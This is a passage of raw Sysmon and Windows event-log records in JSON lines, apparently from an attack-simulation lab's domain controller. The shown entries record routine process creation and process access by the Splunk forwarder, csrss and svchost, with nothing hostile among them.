utility.","Opcode":"Info","spn1":"WSMAN/win-dc-8400769.attackrange.local","spn2":"WSMAN/win-dc-8400769","error":"1355","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2343,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.990\r\nProcessGuid: {E2A3D6B1-1076-5F25-0000-00108C240400}\r\nProcessId: 2180\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.990","ProcessGuid":"{E2A3D6B1-1076-5F25-0000-00108C240400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2344,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.989\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1076-5F25-0000-00108C240400}\r\nTargetProcessId: 2180\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.989","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1076-5F25-0000-00108C240400}","TargetProcessId":"2180","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2345,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.989\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1076-5F25-0000-00108C240400}\r\nTargetProcessId: 2180\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.989","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1076-5F25-0000-00108C240400}","TargetProcessId":"2180","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2346,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.989\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.989","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2347,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.989\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.989","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2348,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.989\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.989","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2349,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.989\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.989","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2350,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.989\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.989","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2351,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.989\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 